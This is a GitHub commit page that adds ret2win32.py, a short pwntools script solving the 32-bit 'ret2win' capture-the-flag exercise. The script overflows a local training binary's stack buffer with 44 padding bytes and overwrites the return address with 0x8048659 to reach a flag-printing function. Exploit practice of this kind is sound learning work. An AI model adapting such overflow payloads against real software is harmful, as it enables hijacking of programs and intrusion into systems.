Skip to content

Commit

Permalink
exploit for 32-bit ret2win
Browse files Browse the repository at this point in the history
  • Loading branch information
@AravGarg
AravGarg authored Mar 28, 2020
1 parent 17fe910 commit 8251d75
Showing 1 changed file with 17 additions and 0 deletions.
17 changes: 17 additions & 0 deletions ret2win32.py
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,17 @@
from pwn import *
target=process('./ret2win32')

#intial payload
payload="A"*44

#return address to print flag
ret2win=0x8048659

#final payload
payload+=p32(ret2win)
payload+="\x00"*2

#send payload
target.sendline(payload)

target.interactive()

0 comments on commit 8251d75

Please sign in to comment.